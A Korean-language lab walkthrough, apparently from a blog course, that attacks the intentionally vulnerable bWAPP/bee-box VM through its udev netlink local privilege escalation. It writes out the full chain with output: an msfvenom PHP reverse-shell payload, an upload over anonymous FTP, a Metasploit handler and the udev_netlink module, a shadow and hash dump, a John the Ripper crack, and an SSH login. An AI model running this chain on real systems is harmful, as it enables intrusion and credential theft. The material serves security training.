웹 해킹 bWAPP - 75. A5 - Security Misconfiguration - Local Privilege Escalation(udev)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- OWASP Top10 A5 - 잘못된 보안 구성
- 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
- Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일
2. udev(userspace device)
- udev에서는 커널레벨에서 오는 netlink 메세지를 검증해야한다.
- 그러나 1.4.1 이전의 udev에서는 netlink 메세지를 검증하지 않기 때문에 변조된 netlink 메세지에 의해서 권한을 획
득할 수 있다.
3. Security Misconfiguration - Local Privilege Escalation(udev)
- CVE-2010-4480 참조 사이트 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
- 이 시나리오는 리눅스 커널 udev 취약점을 이용하여 로컬 권한을 획득하는 내용이다.
Ex1) Security Misconfiguration - Local Privilege Escalation(udev) 이해 I
보안 레벨 선택 및 시나리오 선택
메타스플로잇을 사용할 예정
Ex1) Security Misconfiguration - Insecure WebDAV Configuration 이해
- 만약, 메타스플로잇 모듈에서 제대로 테스트가 안될 경우 다운로드 실시
75-0. udev exploit 다운로드.txt
'test.php'라는 이름으로 Reverse_TCP Payload 생성
|
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.50 lport=4445 > /root/test.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
root@kali:~# ls
Downloads Public Videos pass.txt user.txt
Desktop Music Ransomware b374k-3.2.2.php slowloris.pl
Documents Pictures Templates bWAPP.snmp test.php
root@kali:~# |
bWAPP을 타겟으로 스캐닝 실시
|
root@kali:~# nmap 192.168.20.205
Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 13:13 KST
Nmap scan report for www.bwapphttpslow.com (192.168.20.205)
Host is up (0.000085s latency).
Not shown: 983 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
666/tcp open doom
3306/tcp open mysql
5901/tcp open vnc-1
6001/tcp open X11:1
8080/tcp open http-proxy
8443/tcp open https-alt
9080/tcp open glrpc
MAC Address: 00:0C:29:5B:24:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds |
'anonymous' 익명 계정 사용 유무 스캐닝 실시
|
root@kali:~# locate * .nse | grep ftp
/usr/share/nmap/scripts/ftp-anon.nse
/usr/share/nmap/scripts/ftp-bounce.nse
/usr/share/nmap/scripts/ftp-brute.nse
/usr/share/nmap/scripts/ftp-libopie.nse
/usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-syst.nse
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
/usr/share/nmap/scripts/tftp-enum.nse
/usr/share/sparta/wordlists/ftp-default-userpass.txt
root@kali:~# nmap -p21 192.168.20.205 --script ftp-anon.nse
Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 13:15 KST
Nmap scan report for www.bwapphttpslow.com (192.168.20.205)
Host is up (0.00023s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf
| -rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf
| -rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf
| -rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf
| -rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf
| -rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf
|_-rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf
MAC Address: 00:0C:29:5B:24:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.91 seconds |
bWAPP로 FTP 접속(anonymous/패스워드 없음) -> 'test.php' Payload 업로드 실시 -> 접속 종료
|
root@kali:~# ftp 192.168.20.205
Connected to 192.168.20.205.
220 ProFTPD 1.3.1 Server (bee-box) [192.168.20.205]
Name (192.168.20.205:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: (엔터)
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf
-rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf
-rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf
-rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf
-rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf
-rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf
226 Transfer complete
ftp>
ftp> put test.php
local: test.php remote: test.php
200 PORT command successful
150 Opening BINARY mode data connection for test.php
226 Transfer complete
1114 bytes sent in 0.01 secs (94.3285 kB/s)
ftp>
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf
-rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf
-rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf
-rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf
-rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf
-rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf
-rw-r--r-- 1 ftp nogroup 1114 Feb 20 04:25 test.php
226 Transfer complete
ftp>
ftp> quit
221 Goodbye.
root@kali:~# |
메타스플로잇 실행 및 Exploit 실시
|
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) >
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.20.50
lhost => 192.168.20.50
msf exploit(multi/handler) > set lport 4445
lport => 4445
msf exploit(multi/handler) > exploit
|
'Insecure WebDAV Configuration' 시나리오 선택
'WebDAV' 클릭
'test.php' Reverse_TCP Payload 클릭
bWAPP 연결 상태 확인 -> 'Sendpage' Exploit 실시 -> shadow 파일 내용 확인
|
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4445
[*] Sending stage (37543 bytes) to 192.168.20.205
[*] Meterpreter session 1 opened (192.168.20.50:4445 -> 192.168.20.205:37969) at 2019-02-20 14:33:28 +0900
meterpreter >
meterpreter > cd /
meterpreter > pwd
/
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2013-03-29 04:15:46 +0900 bin
40755/rwxr-xr-x 4096 dir 2013-03-29 05:23:01 +0900 boot
40755/rwxr-xr-x 4096 dir 2013-03-29 04:09:30 +0900 cdrom
40755/rwxr-xr-x 14080 dir 2019-02-19 11:08:39 +0900 dev
40755/rwxr-xr-x 12288 dir 2019-02-19 11:08:57 +0900 etc
40755/rwxr-xr-x 4096 dir 2013-12-12 21:03:56 +0900 home
40755/rwxr-xr-x 4096 dir 2013-03-29 04:12:51 +0900 initrd
100644/rw-r--r-- 7475772 fil 2013-03-29 05:23:00 +0900 initrd.img
40755/rwxr-xr-x 4096 dir 2013-04-02 01:40:57 +0900 lib
40755/rwxr-xr-x 4096 dir 2013-03-29 04:59:09 +0900 lib64
40700/rwx------ 16384 dir 2013-03-29 04:09:28 +0900 lost+found
40755/rwxr-xr-x 4096 dir 2013-03-29 04:12:51 +0900 media
40755/rwxr-xr-x 4096 dir 2013-03-29 05:22:34 +0900 mnt
40755/rwxr-xr-x 4096 dir 2013-03-29 04:12:51 +0900 opt
40555/r-xr-xr-x 0 dir 2019-02-19 11:07:39 +0900 proc
40755/rwxr-xr-x 4096 dir 2019-02-19 11:08:24 +0900 root
40755/rwxr-xr-x 4096 dir 2013-03-29 10:15:39 +0900 sbin
40755/rwxr-xr-x 4096 dir 2013-03-29 04:12:51 +0900 srv
40755/rwxr-xr-x 0 dir 2019-02-19 11:07:40 +0900 sys
41777/rwxrwxrwx 4096 dir 2019-02-19 14:39:43 +0900 tmp
40755/rwxr-xr-x 4096 dir 2013-04-02 05:42:27 +0900 toolbox
40755/rwxr-xr-x 4096 dir 2013-03-29 04:59:08 +0900 usr
40755/rwxr-xr-x 4096 dir 2014-04-19 03:58:25 +0900 var
100644/rw-r--r-- 1904248 fil 2013-03-29 04:09:34 +0900 vmlinuz
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) >
msf exploit(multi/handler) > use exploit/linux/local/udev_netlink
msf exploit(linux/local/udev_netlink) > set session 1
session => 1
msf exploit(linux/local/udev_netlink) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2905
[+] Found netlink pid: 2904
[*] Writing payload executable (207 bytes) to /tmp/DOQlJxWNcB
[*] Writing exploit executable (1879 bytes) to /tmp/fnAySWiLdE
[*] chmod'ing and running it...
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
msf exploit(linux/local/udev_netlink) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2905
[+] Found netlink pid: 2904
[*] Writing payload executable (207 bytes) to /tmp/BDBLxHHbVP
[*] Writing exploit executable (1879 bytes) to /tmp/LInXzxvJPa
[*] chmod'ing and running it...
[*] Sending stage (857352 bytes) to 192.168.20.205
[*] Meterpreter session 2 opened (192.168.20.50:4444 -> 192.168.20.205:52772) at 2019-02-20 14:45:44 +0900
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
msf exploit(linux/local/udev_netlink) > set session 2
session => 2
msf exploit(linux/local/udev_netlink) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2905
[+] Found netlink pid: 2904
[*] Writing payload executable (207 bytes) to /tmp/ZhWlPdYPht
[*] Writing exploit executable (1879 bytes) to /tmp/CoQLvMbHie
[*] chmod'ing and running it...
[*] Sending stage (857352 bytes) to 192.168.20.205
[*] Meterpreter session 3 opened (192.168.20.50:4444 -> 192.168.20.205:52773) at 2019-02-20 14:46:05 +0900
meterpreter >
meterpreter > pwd
/
meterpreter > cd /etc
meterpreter > cat shadow
root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:15792:0:99999:7:::
daemon:*:13991:0:99999:7:::
bin:*:13991:0:99999:7:::
sys:*:13991:0:99999:7:::
sync:*:13991:0:99999:7:::
games:*:13991:0:99999:7:::
man:*:13991:0:99999:7:::
lp:*:13991:0:99999:7:::
mail:*:13991:0:99999:7:::
news:*:13991:0:99999:7:::
uucp:*:13991:0:99999:7:::
proxy:*:13991:0:99999:7:::
www-data:*:13991:0:99999:7:::
backup:*:13991:0:99999:7:::
list:*:13991:0:99999:7:::
irc:*:13991:0:99999:7:::
gnats:*:13991:0:99999:7:::
nobody:*:13991:0:99999:7:::
libuuid:!:13991:0:99999:7:::
dhcp:*:13991:0:99999:7:::
syslog:*:13991:0:99999:7:::
klog:*:13991:0:99999:7:::
hplip:*:13991:0:99999:7:::
avahi-autoipd:*:13991:0:99999:7:::
gdm:*:13991:0:99999:7:::
pulse:*:13991:0:99999:7:::
messagebus:*:13991:0:99999:7:::
avahi:*:13991:0:99999:7:::
polkituser:*:13991:0:99999:7:::
haldaemon:*:13991:0:99999:7:::
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:15792:0:99999:7:::
mysql:!:15792:0:99999:7:::
sshd:*:15792:0:99999:7:::
dovecot:*:15792:0:99999:7:::
smmta:*:15792:0:99999:7:::
smmsp:*:15792:0:99999:7:::
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:15897:0:99999:7:::
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:15897:0:99999:7:::
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:15897:0:99999:7:::
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:15897:0:99999:7:::
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:15897:0:99999:7:::
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:15897:0:99999:7:::
postfix:*:15901:0:99999:7:::
proftpd:!:16051:0:99999:7:::
ftp:*:16051:0:99999:7:::
snmp:*:16178:0:99999:7:::
ntp:*:16178:0:99999:7:::
meterpreter >
meterpreter > run post/linux/ (TAB 키)(TAB 키)
run post/linux/gather/checkcontainer
run post/linux/gather/checkvm
run post/linux/gather/enum_configs
run post/linux/gather/enum_network
run post/linux/gather/enum_protections
run post/linux/gather/enum_psk
run post/linux/gather/enum_system
run post/linux/gather/enum_users_history
run post/linux/gather/enum_xchat
run post/linux/gather/gnome_commander_creds
run post/linux/gather/gnome_keyring_dump
run post/linux/gather/hashdump
run post/linux/gather/mount_cifs_creds
run post/linux/gather/openvpn_credentials
run post/linux/gather/pptpd_chap_secrets
run post/linux/gather/tor_hiddenservices
run post/linux/manage/download_exec
run post/linux/manage/sshkey_persistence
meterpreter > run post/linux/gather/hashdump
[+] root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:0:0:root:/root:/bin/bash
[+] bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:1000:1000:bee,,,:/home/bee:/bin/bash
[+] neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:1001:1001::/home/neo:/bin/sh
[+] alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:1002:1002::/home/alice:/bin/sh
[+] thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:1003:1003::/home/thor:/bin/sh
[+] wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:1004:1004::/home/wolverine:/bin/sh
[+] johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:1005:1005::/home/johnny:/bin/sh
[+] selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:1006:1006::/home/selene:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20190220145013_default_192.168.20.205_linux.hashes_770325.txt
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.20.205 - Meterpreter session 2 closed. Reason: User exit
msf exploit(linux/local/sock_sendpage) >
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(linux/local/sock_sendpage) >
emsf exploit(linux/local/sock_sendpage) > exit -y
root@kali:~# |
'password.txt' 이름으로 bWAPP shadow 내용 생성
root@kali:~# vi password1.txt
|
root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:0:0:root:/root:/bin/bash
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:1000:1000:bee,,,:/home/bee:/bin/bash
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:1001:1001::/home/neo:/bin/sh
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:1002:1002::/home/alice:/bin/sh
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:1003:1003::/home/thor:/bin/sh
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:1004:1004::/home/wolverine:/bin/sh
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:1005:1005::/home/johnny:/bin/sh
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:1006:1006::/home/selene:/bin/sh
:wq! |
존더리퍼 툴을 이용하여 bWAPP shadow 패스워드 크랙 실시
|
root@kali:~# john password1.txt
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 8 password hashes with 8 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
trinity (neo)
1g 0:00:00:13 46.97% 2/3 (ETA: 14:54:31) 0.07593g/s 5884p/s 38312c/s 38312C/s snekciD..nuF
Use the "--show" option to display all of the cracked passwords reliably
Session aborted |
neo/trinity 계정으로 bWAPP SSH 접속 실시 -> 쉘 동작 확인 -> 접속 종료
|
root@kali:~# ssh neo@192.168.20.205
neo@192.168.20.205's password: trinity
Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Wed Feb 20 06:55:06 2019 from 192.168.20.50
$
$
$ ls
Examples
$
$ pwd
/home/neo
$
$ whoami
neo
$
$ cd /
$ pwd
/
$
$ ls
bin dev initrd lib64 mnt root sys usr
boot etc initrd.img lost+found opt sbin tmp var
cdrom home lib media proc srv toolbox vmlinuz
$
$ exit
Connection to 192.168.20.205 closed.
root@kali:~# |
bWAPP에서 'test.php' 삭제 실시
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 75. A5 - bWAPP Security Misconfiguration - Local Privilege Escalation(udev) https://youtu.be/2qcpIZBycek
